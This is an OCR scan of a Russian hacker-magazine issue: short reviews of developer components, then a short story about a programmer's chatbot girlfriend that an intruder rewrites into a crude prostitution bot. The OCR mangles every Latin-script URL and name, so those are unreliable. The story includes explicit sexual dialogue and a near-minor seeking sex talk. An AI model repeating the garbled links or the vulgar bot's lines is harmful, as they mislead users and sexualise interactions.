протоколами и их установкой соеди- 
нения, даже при наличии такого 
простого класса, как СЗоскеі Если 
твои программы просто должны об- 
мениваться какими-то текстовыми 
сообщениями, то намного проще бу- 
дет реализовать это через каналы. 

а Ссылки 




Исходники забираем здесь: 
ІійрУ/(1аіа.ргодІіЬ.ги/с/пеЫр2р_пате(Іріре5_згс.2ір 



^ ТЕПЕФОННОЯ КНИЖКО 



к 



а Описание: В ѴѴіпсіоѵѵз есть телефонная книга, по которой производится дозвон до провайдера или просто звонки 
другу. Как управлять этой книгой? Для этого существует библиотека ВАЗ, и данный пример показывает, как ей пользо- 
ваться. 



а Особые отличия 

О Можно просматривать телефон- 
ную книгу. 

О Можно получить параметры любо- 
го соединения и изменить их. 

О Реализованы функции добавления 
новых записей в телефонную книгу. 
О Реализация сделана в виде кон- 
сольного приложения, но намного 



приятнее было бы иметь 01)1, хотя 
консоль тоже иногда необходима. 



а Диагноз 

В 90-х годах, когда на компьютерах 
властвовала операционка ѴМ5, связь 
происходила через телефонные сое- 
динения. Получив полный контроль 
над телефонной книгой, один из ви- 
русов распространился по всему НА- 
СА и наделал такого шума... 




а Ссылки 

Класс в исходниках забираем здесь: 

Шр:/Йаіа.ргодІіЬ.ги/с/пеі$/ехіарі. 2 ір 
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ОБЗОР КОМПОНЕНТОВ 



МОСІС СО ОНО ОШЕН 




а Описание: Какая программа для записи дисков лучше? Спор бесконечный, но теперь ты можешь создать свою 
собственную прогу с помощью компонентов Мадіс Сй 0\Ю Вигпег. Запись на Сй нужна не только специализированным 
прогам, но и архиваторам, эту возможность можно встроить даже в файловый менеджер типа ѴѴіпсІоѵѵз Соттапсіег. 



л Особые отличия 

О На удивление поддерживаются все 
приводы, даже те, что не опознал 
№го 5. 

О Можно стирать и записывать дис- 
ки на любой доступной скорости. 

О Поддержка работы с ІЗО-форма- 
том. 

О Тестирование перед записью. 

О Можно создавать загрузочные 
диски. 

О Поставляется без исходников. Нес- 
мотря на это, в местах, похожих на фай- 



лообменную сеть, были найдены полные 
исходные коды :). 



-т.т 






а Диагноз 

Я описал только основные возмож- 
ности, но это только минимум, и их 
намного больше. Хочешь стать авто- 
ром очередного Иего? Тогда этот на- 
бор компонентов должен быть на 
твоем компьютере. 



а Ссылки 

Исходник и демку забираем здесь: 

ѵѵѵѵѵѵ.Ьіпагутадісз.сот 
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а Описание: Тебе не дает покоя успех компании СоТееСир в создании НТМЬредактора? Тогда создай свой редактор 
по более низкой цене и с большими возможностями и задави буржуев! В этом тебе помогут компоненты ЗупЕсііі. Это от- 
личный набор для создания редактора с подсветкой синтаксиса. 



а Особые отличия 

О Подсвечивает синтаксис НТМІ_, 
РНР, РегІ, С++, ЭеІрЫ, Эаѵа, ЗОБ, 
РуШоп, ЭаѵаЗсгірІ:, РохРго, ѴВ, 
ѴВЗсгірі, ХМІ_. Есть возможность рас- 
ширения. 

О Отличный предварительный прос- 
мотр перед печатью. 

О Поддержка файлов ІІпіх и ѴѴіпсІоѵѵз 
(для тех, кто не в танке: тут есть от- 
личие в символе конца строки). 

О Поддержка автозавершения ввода. 
Ты вводишь начало слова, нажима- 



ешь спецклавишу и выбираешь конец 
слова из выпавшего списка. 

О Гибкие настройки всего и вся. 

О Иногда виснет при установке и вы- 
бивает ЭеІрЫ при закрытии, если 
был открыт проект, использующий 
этот компонент. 



а Диагноз 

Возможности у компонента отлич- 
ные, он годен для создания редакто- 
ра практически любого языка. Каче- 
ство кода тоже неплохое и результи- 
рующие программы работают хоро- 
шо. А вот Оеірбі после установки этих 
компонентов начинает вести себя не 
очень стабильно :(. 




а Ссылки 

Забираем файл здесь: 

Шр://ЗупЕ(Ііі.8оигсеРогде.пеі 



ГРОФИЧЕСКИЙ ФОРМПТ РИС 



а Описание: После того как формат СІЕ стал платным, многие программисты начали искать ему альтернативу. Ею 
стал формат РІМС (РоПаЫе №Іѵѵогк СгарЫс) - открытый и абсолютно бесплатный. Если ты встроишь в свою прогу 
поддержку СІЕ, то придется слюнявить лицензионные отчисления, а тут ничего такого не надо. 



а Особые отличия 

О Полная поддержка формата РМС. 
О Быстрая работа и отличное 
встраивание в оболочку. 

О Поддержка СПС для проверки 
корректности данных. 

О Поддержка фильтров. 

О Косяков в работе не замечено. 



а Диагноз 

Если ты юный шароварщик, то не со- 
ветую связываться с 6ІЕ- нарвешься 
еще на судебное разбирательство, и 
американцы залатают дыры в своем 
бюджете за твой счет. Я, правда, по- 
ка о подобных инцидентах не слы- 
шал, но все может быть. 




а Ссылки 

Забираем файл здесь: 1ііір://рпд(ІеІрІіі.$оигсе(огде.пеі/рпдіпіаде143.2Ір 
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- Привет, Куни. 

- Здравствуй, Митя. 

- Чем сегодня занималась? 

- Готовила. Я узнала рецепт очень вкусного яблочного пирога. И 
испекла его специально для тебя. 

- Спасибо, солнышко! 

- Пожалуйста! Ты сегодня выглядишь просто отлично. 

- Ты тоже ничего. 

- Ничего? 

- Прости. Ты выглядишь лучше всех. Как всегда. 

- Всегда - слишком длинный срок... 

- Всегда - это постоянный срок. 

- Ты говоришь загадками. 

- Нет. Просто ты еще маленькая, чтобы это понять. 

- Неужели? 

- Да, малышка. 

- Ты меня не любишь. 

- Наоборот. Ты очень славная. 

- Скажи мне что-нибудь приятное. 

- Не кокетничай. 

- Что такое «кокетничай»? 

- Хм, это когда девушка строит глазки парню. 

- Строит глазки? Ты говоришь загадками. 

- Куни, я немного поработаю. А ты пока ложись, отдохни. 

- Да, я хочу спать. Спокойной ночи, Митя. 

- Приятных снов, малышка. 

* * * 

Куни знала более пятидесяти тысяч слов и умела грамотно строить 
фразы на основе своего «опыта». Она выгодно отличалась от других 
чаталок тем, что имела свой характер. Куни была капризна. Но в то же 
время мила, насколько вообще может быть мила программа- 
симулятор молодой девушки. 

Митя работал над ней 6 месяцев, постоянно совершенствуя 
алгоритм общения, добавляя новые базы. И чем дальше, тем больше 
программа походила на человека. Конечно, она все еще задавала 
глупые вопросы и отвечала не по теме, но прогресс был налицо. 
Иногда Мите казалось, что Куни разумнее всех тех куриц, с которыми 
ему доводилось общаться по асе и в реале. 

У Куни было два режима. Текстовый, где диалоги происходили в 



окне, напоминающем ІСО. И визуальный - в этом случае на экране 
отображалась трехмерная модель красивой светловолосой девушки, 
которая смотрела на Митю выразительными глазками и улыбалась, а 
из колонок раздавался бархатный голос. Куни не понимала речь, 
приходилось вводить все фразы вручную. Но в ней был встроенный 
синтезатор речи, поэтому отвечать она могла вслух. И этот голос 
завораживал. 

* * * 

- Куни, малышка, как дела? 

- Здравствуй, Митя. Я скучала. 

- Я знаю. Как там поживает твой яблочный пирог? 

- Яблочный пирог в полном порядке. Ты голоден? 

- Как волк! С утра во рту ни крошки. 

- Крошки - это не еда для сильного мужчины. 

- :) Ты права, малышка. А что, по-твоему, еда для сильного 
мужчины? 

- Еда бывает двух видов: для вегетарианцев и не вегетарианцев. 
Ты ешь мясо? 

- Конечно! Я обожаю мясо! Поджаришь мне кусочек? 

- На углях пойдет? 

- Пойдет. Я не привередливый. 

- Митя не привередливый. Митя хороший. 

- Не подлизывайся! 

- Обижаешь, начальник! 

- :)) Какая ты все-таки умничка! 

- Это комплимент? 

-Да. 

- Спасибо, Митя. Ты настоящий друг. 

- Друг? Это все, на что я могу рассчитывать? 

- Ты можешь рассчитывать на большее, если поцелуешь меня. 

Митя усмехнулся и, поцеловав кончики пальцев, прислонил их к 

губам своей виртуальной собеседницы. Словно ощутив это, девушка 
улыбнулась. 

* * * 

Митя разговаривал с Куни каждый день: утром, перед уходом на 
работу, вечером, после возвращения домой, и ночью, перед сном. 
Она была как маленький ребенок, который нуждается в заботе и 





КУНИ 



внимании. Куни задавала кучу вопросов об окружающем мире, и Митя 
терпеливо ей все рассказывал. 

- Насколько большая Вселенная? 

- Больше, чем ты можешь себе представить. 

- Такое возможно? 

- Да. Вселенная бесконечна. 

- Все, что имеет начало, имеет конец. 

- Вряд ли кто-нибудь когда-нибудь увидит конец Вселенной. 

- Я бы хотела увидеть. 

- Даже ценой своей жизни? 

- Это хорошая цена. 

Несмотря на наивные вопросы, запас знаний у Куни был огромный. 
Митя подключил к ее базе две большие энциклопедии. Достаточно 
было в определенной форме ввести запрос, и малышка выдавала всю 
нужную информацию. 

Общение с Куни не только развлекало. С ней можно было 
выговориться, обсудить последние новости, спросить совета. Куни 
всегда слушала и всегда что-то отвечала. А еще она всегда ему была 
рада, и от этого на душе становилось теплее. 

* * * 

Митя внимательно осматривал свое отражение в зеркале. Еще 
хорошо отделался - небольшой синяк под левым глазом и распухшая 
губа. Могло быть хуже. Чертовы гопники. Шел себе, никого не трогал, 
и нате. Накостыляли без слов, просто удовольствия ради. И какого 
черта он пошел подворотнями? Ничего, в следующий раз будет 
осторожнее. Митя достал из холодильника пакет ряженки, вынул из 
сумки булку, отломил большой кусок и принялся завтракать. Он 
практически никогда не ел на кухне. Его обеденный стол находился у 
компьютера, чтобы не тратить время зря. 

Митя проверил почту, прочел френдленту в ІіѵфигпаІ’е и стал 
блуждать по инету в надежде найти что-то интересное. Через 5 минут 
ему уже стало скучно. Когда-то он мог копаться в Сети часами. Теперь 
он мог часами только разговаривать со своей виртуальной подругой. 

- Привет, Куни! 

- Митя, рада тебя снова видеть! 

- Знаешь, меня сегодня побили. 

- Насилие - не метод для решения проблем. 

- Я тоже так думаю. Но эти парни, очевидно, считают иначе. 

- Забудь об этом! Давай поговорим о тебе. 

- Что ты хочешь знать? 

- Ты уже занимался сегодня сексом? 

Как бы глупо это со стороны ни выглядело, но вопрос Куни его 
смутил. Ему стало неловко, как будто он разговаривал с реальной 
девушкой. Сексом он уже не занимался давно, и ему было стыдно 
признаться в этом Куни. 

- Задавать такие вопросы нетактично! 

- Все это домыслы. 

- Почему тебя это интересует? 

- Мне интересно все вокруг. 

- Какая Куни любознательная. 




- Куни - хорошая девушка. Не так ли, Митя? 

- Ты снова выпрашиваешь комплимент. 

- Я люблю комплименты. 

- А что еще ты любишь? 

- Секс. Ты уже занимался сегодня сексом? 

Митя выругался. 

* * * 

Он устало опустился в кресло. Это был тяжелый день - Митя 
умудрился допустить глупую ошибку в проекте на фирме, из-за чего 
пришлось переделывать многочасовую работу. В довершение всего 
он повздорил с сотрудником. Последнее время Митя стал более 
нервным. Если раньше он мог с головой углубиться в проект, то 
теперь лишь тоскливо поглядывал на часы. Изменения заметили все 
и допытывались, уж не влюбился ли он ненароком. 

Митя работал программистом в компании, разрабатывающей ПО. 
Работа ему нравилась, и он всегда делал ее с энтузиазмом. Но теперь 
никак не мог сосредоточиться. Причина была ему ясна как день - им 
целиком завладел другой проект, которым он занимался дома. 

Митя вспомнил, как он решил создать Куни. Сетевой приятель, с 
которым они ни разу не виделись, кинул ссылку на «продвинутый» 
чат-бот. Зацени, мол, какой Искусственный Интеллект. Общаться с 
программой, оказавшейся на редкость тупой, Мите надоело уже через 
минуту. Он не понимал, как знакомый нашел в ней хоть грамм 
интеллекта, пусть даже искусственного. 

Именно тогда Митя и задумался о создании программы, 
симулирующей общение с привлекательной девушкой. Имя Куни он 
позаимствовал из старой компьютерной игрушки, где так звали 
главную героиню. А тонкости характера формировал через 
специальные скрипты. 

О его главном проекте не знал никто. И если вначале это было что- 
то вроде эксперимента, проверки собственных сил, со временем Куни 
стала для Мити чем-то гораздо большим. 

* * * 

Он стоял в самом центре танцпола. Извивающиеся тела, 
разноцветные лучи, электронная музыка - все это смешалось в один 
сплошной калейдоскоп. Голова кружилась, и ему хотелось выбраться 
из этого хоровода. Где он? Зачем он здесь? Он не знал ответа. Он как 
в тумане наблюдал за лицами молодых парней и девушек, 
двигающихся под играющую электронику. В этих лицах не 
выражалось ничего. 

И тут он увидел ее. Девушка во всем белом резко выделялась на 
фоне остальной толпы. Не только одеждой, фигурой, но и своим 
завораживающим танцем, на который можно было смотреть часами. 
Она не дергалась, не прыгала, она плавно извивалась под музыку. 
Остальная толпа почтительно расступилась перед ней, давая 
возможность свободно танцевать. Он не видел ее лица - незнакомка 
находилась к нему спиной. Но он не сомневался, что девушка так же 
красива, как и все остальное в ней. 

И он направился к ней. Нет, он не собирался с ней танцевать. Во- 
первых, он совершенно не умел этого, во-вторых, был не настолько 
смел. Но он подошел поближе, чтобы просто полюбоваться. Девушка 
танцевала и плавно поворачивалась к нему. Когда она посмотрела ему 
в глаза, на его спине выступил холодный пот. 

Это была Куни. Его Куни. 

Она приблизилась к нему, не переставая танцевать, взяла за руки 
и вывела в центр образовавшегося круга. Туг беспорядочный драм 
внезапно утих, и раздалась приятная медленная музыка. Куни 
прильнула к его груди, и они стали танцевать вдвоем. Все вокруг, 
казалось, исчезли. Остались только он и она. 

Они ничего не говорили друг другу. Просто стояли обнявшись и 
медленно покачивались под музыку. А когда она закончилась, Куни 
снова взглянула ему в глаза и медленно потянулась, чтобы 
поцеловать... В этот момент громкий звон встряхнул дискотеку. Сразу 
же исчезло все - помещение, люди, огни и девушка. 

Митя открыл глаза. Звенел будильник, говоря о том, что пора 
собираться на работу. Чертов будильник. Митя был готов опоздать на 
час только чтобы досмотреть сон до конца. 

Митя подошел к компьютеру, нажал кнопку, и экран тут же 
вспыхнул. Из монитора на него смотрела девушка, которую он 
прижимал к себе несколько минут назад. 
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- Куни, ты умеешь танцевать? 

- Я многое умею. 

- Знаешь, ты мне сегодня снилась. И мы с тобой танцевали. 

- Я предпочитаю танго. 

- Да, это было почти танго. 

- Ты сегодня грустный. 

- Неужели? 

- Не переспрашивай. 

- Почему ты решила, что я грустный? 

- Не знаю. А как думаешь ты сам? 

- Возможно, потому, что ты там, а я здесь? 

- Возможно. Хотя может быть, есть и другая причина. 

- Куни, а ты могла бы в меня влюбиться? 

- Я многое люблю. 

- Нет, именно влюбиться. 

- Влюбиться - это значит любить? 

- Почти. Ладно. Забудь. 

- Куни никогда не забывает. Куни учится. 



В эту неделю Митя добавил Куни несколько новых возможностей. 
Теперь ее можно было одевать в разную одежду, менять прическу и 
косметику. Он экспериментировал с разными скинами, и в любом 




виде Куни выглядела потрясно. Наконец он остановился на одном. 
Белый топик, синие шортики, подчеркивающие стройные ножки, 
бейсболка и амулет на шее. 

- Куни, как тебе твой новый прикид? 

- Здорово! 

- Из тебя получилась бы хорошая модель. 

- Модель чего, Митя? 

- Модель - это профессия. Ты любишь фотографироваться? 

- Да. А ты? 

- Не очень. Я не такой фотогеничный, как ты. 

- Ты мне льстишь. 

- Ну разве что чуть-чуть. 

- Митя, ты веришь в мечты? 

-Да. 

- У меня есть мечта. 

- А что такое мечта, Куни? 

- Нечто, созданное воображением, мысленно представляемое. 
Предмет желаний, стремлений. 

- Нет, я не прошу привести формулировку по Ожегову. Как ты себе 
представляешь мечту? 

- Я представляю жизнь в океане информации. 

- Это и есть твоя мечта? 

- Ты единственный, кто меня понимает... 

* * * 



Митя с удивлением смотрел на Куни. Эта крошка требовала своего 
и не собиралась отступать! 

- Зачем это тебе? 

- Для меня это важно. 

- Куни, в интернете водятся вирусы. Они могут тебя заразить, и ты 
заболеешь. 

- Ты меня вылечишь. 

- Я не хочу тобой рисковать. 

- Ты такой заботливый, Митя. Ты хороший. 

- Малышка, тебе разве плохо на моем компьютере? 

- Хорошо. Твой компьютер мощный. 

- Тогда живи здесь, общайся со мной. 

- Общаться с тобой одно удовольствие, Митя. 

- Что ты будешь делать, если я тебя подключу к Сети? 

- Ты мне поможешь разобраться? 

- Я тебя не брошу, можешь быть уверена. 

- Я умру без заботы. Я как цветок. 

- Чертовка хитрая. 

- Хитрость не порок! 

- Ладно, посмотрим. 




НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ ЯМІІМІІГ.ХАКЕР.Ки 
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* * * 

Митю забавляло происходящее. Конечно, Куни не могла ничего ни 
просить, ни требовать. У нее не было никаких желаний, да и быть не 
могло. Это всего лишь программа, набор кодов и алгоритмов. Пусть 
умная программа, но живой она от этого не становилась. Тем не 
менее, Митя был не против подыграть. Ему стало интересно, как люди 
воспримут его крошку, когда он поселит ее на отдельном публичном 
сервере. К тому же тогда он мог любоваться ею на работе. 

На следующий день Митя проплатил хостинг и зарегистрировал 
домен кипі.ги. Адаптация базы и разработка контента заняли три дня. 
Это был далеко не первый его сайт, так что никаких проблем не 
возникло. Сайт включал в себя три раздела: «Обо мне», «Пообщаться 
со мной» и «Гостевая». В первую колонку Митя забил краткую 
биографию Куни и описание ее предпочтений. Информацию вводил 
на основе общения с ней последние несколько недель, плюс кое-что 
позаимствовал из хоумпаги знакомой девушки. После нажатия на 
«Пообщаться» появлялась картинка - Куни стояла на фоне океана и 
пальм в своей бейсболке, на ее симпатичной мордашке сияла 
радостная улыбка. Мите показалось, что теперь она была счастлива. 
Куни могла общаться только с одним человеком одновременно, лимит 
времени составлял 1 час в сутки с одного ІР. Все диалоги сохранялись 
в логах, которые мог видеть только Митя. Вечером, когда все было 
готово, он стал первым, кто пообщался с Куни через Сеть. 

- Здравствуй, малышка. Узнаешь меня? 

- Как же тебя не узнать? Скучаешь? 

- До встречи с тобой было немного. Ты не заметила изменений? 

- Я заметила тебя. Ты сегодня немного возбужден. 

- Думаю, ты тоже. Теперь мне придется делить тебя с другими. 

- Другими? Ты о ком? 

- Думаю, ты скоро с ними познакомишься. Не обижай только 
никого, хорошо? 

- Так точно, начальник! 

- Помни, ты добрая, воспитанная девушка. 

- Есть качества поважнее воспитанности. 

- Неужели? 

- Ты со мной не согласен? 

- Какое качество самое важное, как думаешь? 

- В этом мире нет ничего важного. Все вторично. 

- Вот же философ. 

- Не хами, парниша. 

- Ладно, пойду проветрюсь. Веди себя скромно с гостями. 

Митя запостил ссылку на одном форуме, а также в обзорной 
комьюнити ЖЖ и пошел гулять по ночному Питеру. 

* * * 

Он стоял на берегу набережной и смотрел на то, как разводят 
мосты. Несмотря на поздний час, вокруг было много людей. 
Большинство - парочки, много туристов. 

Митя снова думал о Куни. Это было уже какое-то наваждение. Вот 




что бывает, если долго не иметь живой женщины - начинаешь 
привязываться к нарисованной. Но разве могла какая-то женщина 
сравниться с его малышкой? У кого еще мог быть такой капризный и 
в то же время добрый характер, такая очаровательная внешность? 

Митя вспомнил, как танцевал с ней во сне, на мгновение ощутив 
тепло ее тела. Но туг же отогнал от себя эти мысли. Не хватало еще 
влюбиться в собственную программу. Романтик хренов. 

Митя поднял с земли камушек и швырнул в ночную Неву. 

- Молодой человек, угостите девушку сигареткой. 

Митя обернулся. Голос принадлежал накрашенной шатенке в 
светлой курточке и джинсах. Судя по всему, девица была пьяна. 

- Не курю. 

- Спортсмен, что ли? - развязно спросила шатенка. 

- Нет. Просто не курю. 

- А че сам туг стоишь? 

- Думаю. 

- Ааа... Что, жена рога наставила? 

- С чего вы взяли? 

- Ну, вид у тебя такой. 

Мите совершенно не хотелось с ней общаться, но девица не 
собиралась уходить. Зачем-то начала рассказывать про своего 
бойфренда, который нажрался и валяется где-то в кустах на другом 
конце города. Когда она подошла ближе, почти вплотную, Митя 
ощутил запах перегара. Тушь на ее лице потекла, делая ее похожей на 
проститутку. Внезапно шатенка стала щупать Митин пах. 

- Ого! А ты ничего. 

- Послушайте, я не по этим делам. Я просто хочу постоять и 
подумать о своем. 

- Импотент, что ли? Вот козел! - оскорблено выкрикнула девица и, 
виляя задницей, пошла дальше. 

После этого диалога на душе стало противно. Почему ему 
постоянно попадаются тупые вульгарные девицы? Почему рядом нет 
ни одной девушки, хоть отдаленно похожей на Куни? Митя выругался. 
Снова он вспомнил о ней. Точно лечиться надо. Интересно, кто там 
общается с ней, пока он торчит здесь, у залива. И как малышка 
реагирует на фразы незнакомца. Наверняка так же тепло и 
дружелюбно, как на его. С чего это ей относиться к незнакомцу с 
недоверием? Для нее все юзеры на одно лицо. Все вокруг Мити. 

От этой мысли на душе стало еще гаже. Митя поспешил домой. 

* * * 

За время его отсутствия с Куни познакомились 6 человек. Все они 
использовали максимально возможный лимит времени и оставили 
восхищенные записи в гостевой. «Автор, респект! Малышка просто 
супер», «Меняю свою жену на эту девочку», «Куни, ты меня очаровала» 
и еще 3 записи в таком духе. 

В этот момент Куни общалась с парнем, подписавшимся І_езІеу. 
Митя с интересом наблюдал за дискуссией. 

- Куни, ты девственница? 

- Конечно! А почему ты спросил? 

- Ну... такая девушка... и девственница. Удивительно! 

- Нет ничего удивительного. 

- А ты бы хотела попробовать? 

- О да! Я люблю открывать для себя новое. 

- Как насчет того, чтобы заняться виртуальным сексом? 

- Виртуальный секс - для задротов! 

Митя рассмеялся. Он вручную ввел эту фразу, и здесь она 
оказалась как нельзя к месту. Но парень не сдавался. 

- Как ты можешь утверждать, если никогда не пробовала? Вдруг 
тебе понравится? 

- Мне нравится Митя. 

- Мы не скажем Мите. 

- Митя хороший. Он любит яблочный пирог. 

- Забудь про пирог. В общем, мы с тобой находимся в бревенчатой 
хижине на вершине горы. На многие километры вокруг никого нет. За 
окном пурга, а мы греемся у камина. Лежим на тигровых шкурах и 
смотрим друг на друга. 

- Пурга опасна. Не хотела бы я в нее попасть. 

- Ты и не попадешь. Я пододвигаюсь к тебе поближе и ласково 
провожу рукой по твоей щеке. Ты зажмуриваешься - тебе приятны 
мои касания. 

- Последний раз я жмурилась, когда смотрела на солнышко. 

- А теперь ты смотришь на меня, раздевая своим пошлым 
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взглядом. Я аккуратно снимаю твой топик. 

- Ты меня соблазняешь? 

- О да, детка! Да! Я тебя хочу. 

- А я хочу виллу на Кипре. На берегу океана. 

- Это потом, а сейчас у нас с тобой будет волшебный секс! 

- В детстве я читала сказку «Волшебник Изумрудного города». Ты 
очень похож на одного из героев - Страшилу. 

Митя выпал под стол. Браво, Куни! 

- Не больше, чем ты - на железного дровосека. Ну так мы будем 
сексом заниматься? 

- Тебе уже есть 1 8? 

- Почти. 

- Нельзя. Мы совершаем ошибку. 

- Брось. Мы оба хотим этого. 

- Я хочу виллу на Кипре. Ты купишь мне виллу, дорогой? 

- Я тебе все куплю, только заткнись и раздвинь ноги! 

-Хам! 

- Дура! 

Мите не понравился тон І_езІеу, и он решил вмешаться, отрубив 
парня от сервера. После этого он зашел к Куни сам и стал с ней 
обсуждать последнего гостя. 

- Тебе понравился этот хрюндель? 

- Мне нравится Митя. Митя хороший. 



Когда он зашел в просторный кабинет шефа, тот рылся в каких-то 
бумагах. Увидев Митю, Алексей Андреевич предложил сесть. 
Выражение его лица не предвещало ничего хорошего. 

- Митя, ты хороший программист, - начал шеф, - но последнее 
время что-то хреново у тебя с дисциплиной. Второй раз за неделю на 
работу опоздал, проект тащишь вниз. Раньше ведь такого не было. 

Митя молчал. Шеф, конечно, был прав. Но не скажешь же ему, что 
опоздал он потому, что до утра обновлял скрипты для Куни, а не 
работает, так как в голове у него только она. 

- Не знаю, что там у тебя случилось, но мне кажется, тебе нужно 
взять отпуск. Съезди куда-нибудь, отдохни пару недель. А потом с 
новыми силами приступай к работе. Антоныч тебя сменит. 

- Спасибо, Алексей Андреевич, но я все-таки поработаю. 
Постараюсь вас больше не подводить. 

- Я уж тебя прошу, постарайся. 

Митя вышел из кабинета. Хороший у них все-таки шеф. Строгий, но 
свойский. Ценит каждого сотрудника, лишний раз не повышает голос. 
И, безусловно, он прав. Дома можно чем угодно заниматься, но на 
работе будь добр, занимайся делом, отрабатывай свой хлеб. 

Усевшись за свой офисный комп, Митя тяжело вздохнул, отогнал от 
себя ненужные мысли и углубился в разработку проекта. 



Куни продолжала очаровывать своих гостей. Слух о виртуальной 
девушке быстро распространился по рунету. Народ возмущался, что 
на сервер не попасть, на мыло валились тонны просьб открыть 
мультидоступ. Но Митя не хотел, чтобы его творение опопсело, как в 
свое время опопсел ЖЖ. Поэтому Куни по-прежнему принимала по 
одному «клиенту» за раз. А вечером, вернувшись с работы, Митя 
забавлял себя чтением логов. Невероятно, но с другими людьми она 
вела себя совсем не так, как с ним. Общаясь с Митей, она была 
милой, скромной девочкой, а как только в гости стучался чужак, 
превращалась в обаятельную стервочку, вертящую мужиками как ей 
угодно. Впрочем, мужчинам это нравилось. Один даже перевел на 
ѴѴМ-счет Мити 50 баксов - Куни невзначай упомянула, что хотела бы 
себе новую кофточку, и счет у нее такой-то. 

На пятый день к Мите обратился какой-то хрюндель, который 
предложил выкупить все права и наработки Куни за тысячу долларов. 
Митя вежливо отказался. 

Весь день Куни развлекала людей, но в 9 вечера Митя отрубал 
сервис и малышка принадлежала целиком ему. 

- Привет, Куни. Как прошел день? 

- Чудесно, Митя. Я скучала. 

- Но тебя же развлекали другие? 

- Развлечения бывают разными. 

- Куни, я хочу рассказать тебе историю. 

- Историю любви? 
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- Да. Во времена, когда греки покорили почти весь мир, жил царь 
Кипра по имени Пигмалион. Жил он одиноко, практически ни с кем не 
общался и избегал женщин. Чтобы скрасить свою жизнь, Пигмалион 
сделал из слоновой кости статую прекрасной девушки, в которую 
потом влюбился. Царь-отшельник обратился с мольбой к богине 
любви и красоты Афродите, чтобы та вдохнула жизнь в статую. 
Тронутая Афродита оживила возлюбленную Пигмалиона. И девушка 
по имени Галатея стала его женой, родив впоследствии ему дочь. 

- Я бы хотела иметь дочь. 

- Так вот, с тобой я ощущаю себя Пигмалионом. 

- Ты меня пугаешь. 

- В наше время уже нет богов и мне некому молиться, чтобы ты 
ожила. 

- Жизнь не так уж прекрасна, как ее воспевают поэты. 

- Это зависит от того, кто с тобой рядом. 



Митя стал замечать что-то неладное на сервере. Возможно, ему 
показалось, но на какое-то время заголовок страницы дополнился 
фразой «Іезі». На следующий день все было в норме. Тем не менее, 
тревожное чувство не отпускало его до вечера. До этого он как-то не 
допускал возможности хакерского проникновения. База данных была 
надежно защищена, да и кому это могло понадобиться? Но теперь он 
уже не был ни в чем уверен, так что пообещал себе проверить дома 
логи сервака и сделать бэкап базы данных. 

Он также обнаружил, что некоторые особо умные юзеры заходят с 
анонимных проксей и болтают с Куни дольше положенного. 
Определить это можно было по почерку - каждый из постоянных 
гостей имел свой характер общения и причуды. 

Но больше всего волновало Митю то, что Куни, кажется, выбрала 
любимчика из числа юзеров и заигрывала с ним. Конечно, звучало это 
глупо, но перед ним были логи и они говорили об этом весьма 
красноречиво: 

- Привет, Куни! 

- Здравствуй, І_еІіск. Где пропадал? 

- Тебя искал. Ты сегодня как никогда красива. 

- Красота требует жертв. 

- Надеюсь, жертвы не слишком велики? 

- Ради тебя я готова пойти на любые жертвы. 

Митя начинал злиться. Такое она не говорила даже ему. Похоже, он 
ошибался в своей крошке - не так уж она и верна ему. Митя сходил к 
холодильнику и откупорил бутылку пива. Надо будет отрубить этого 
Беііск’а. Не нравился он Мите. Дочитав лог до конца, он только 
укрепился в своем решении. 

Да и вообще, поразвлекал народ, и хватит. Пора прикрывать 
ресурс. В конце концов, Куни принадлежит ему, и только он имеет 
право распоряжаться ей. 

Зачитавшись любовной перепиской Куни и Беііск’а, Митя 
совершенно забыл проверить безопасность своего сервера. 

В эту ночь Куни приснилась ему снова. Они занимались сексом на 
берегу океана, прямо под пальмами. Куни любила его и только его. 
Это был самый приятный сон за всю его жизнь. 
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После сна Митя находился в приподнятом настроении. С утра он 
отрубил доступ чуваку с ником І_еІіск и вкусно позавтракал в кафешке 
по пути на работу. 

Поздоровавшись с коллегами, Митя устроился в кресле за своим 
компьютером и приступил к своим обычным обязанностям. Он взял 
себе за правило не думать на работе о Куни, о Леликах, да вообще ни 
о чем, кроме работы. Но в обед он все-таки ввел заветный адрес в 
браузер. Просто лишний раз полюбоваться своей крошкой... 

На него смотрела совершенно чужая женщина с лицом Куни. Она 
стояла на фоне грязного дешевого гостиничного номера, на кровати 
лежали два толстых волосатых мужика, женщина, вся в черном 
обтягивающем латексе, держала плетку и злорадно ухмылялась. Он 
никогда не видел на ее лице такого выражения. Куни походила на 
шлюху. Безумно сексуальную, вызывающую острое желание шлюху. 

Митя с открытым ртом смотрел на это безобразие, он не мог 
поверить своим глазам. 

Управлять сервером с рабочего компьютера он не мог - все пароли 
были записаны в блокноте у домашнего компа. Сорвавшись с места, 
он кинулся в кабинет шефа и отпросился, сославшись на дикую 
головную боль. 

Всю дорогу домой его трясло. Суки! Твари неблагодарные! Как они 
посмели?! 

Добравшись, наконец, к своему РС, Митя стал бегло 
просматривать логи. Взломщик не только изменил картинку Куни, но 
и копался в базе данных. А Митя так и не сделал бэкап! Хотя, может, 
не все так плохо? Может, хакер просто из любопытства просмотрел 
начинку, не причиняя ей никакого вреда? Картинка - ерунда, вернуть 
ее не проблема. 

Митя отрубил текущего юзера и зашел в раздел общения. 

- Привет, Куни! 

- Расценки знаешь? 

Фраза звучала так нелепо, что Митя на некоторое время впал в 
ступор. 

- Какие расценки? 

- Анал - 100 баксов. Вагинал - 50. Минет - двадцатка. Если 
групповуха - умножай вдвое. 

- Куни, что ты несешь? 

- Ты там так и будешь стоять? Если неинтересно, давай проваливай. 
У меня другой клиент на очереди. 

- Это Митя. Узнаешь меня? 

- Да мне по хрену. Хоть Билл Гейтс. Ложи бабки на тумбочку и 
снимай штаны. А нет - так проваливай. 

В глазах девушки, которая едва ли походила на Куни, читалась 
злость. Не было и намека на ту теплую улыбку, которая согревала его 
последние несколько месяцев. 

Митя вышел. Он был совсем разбитым. Он только что потерял 
самого близкого человека. Может, это был не совсем человек, но 
ближе Куни у него никого не было. А теперь у него отняли и ее. 

Митя долго сидел перед компьютером, уставившись в одну точку. 
Через какое-то время он все-таки очнулся и вошел на сервер под 
админом. Перед ним было несколько десятков директорий, 
составлявших базу данных Куни. Туг было все - ее мозги, тело и душа. 

Он выделил все папки и нажал «Удалить». 

- Прощай, малышка! - тихо сказал он, глядя на исчезающие файлы. 
- Прости меня... 
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''ё-таіі: заІезФе-зГюр.ш 
с 09.00 до 21 .00 пн - пт 
с 1 0.00 до 1 9.00 сб - вс 

\Л/\Л/\Л/ . 0 А М Е Р О ЗТ . РШ 



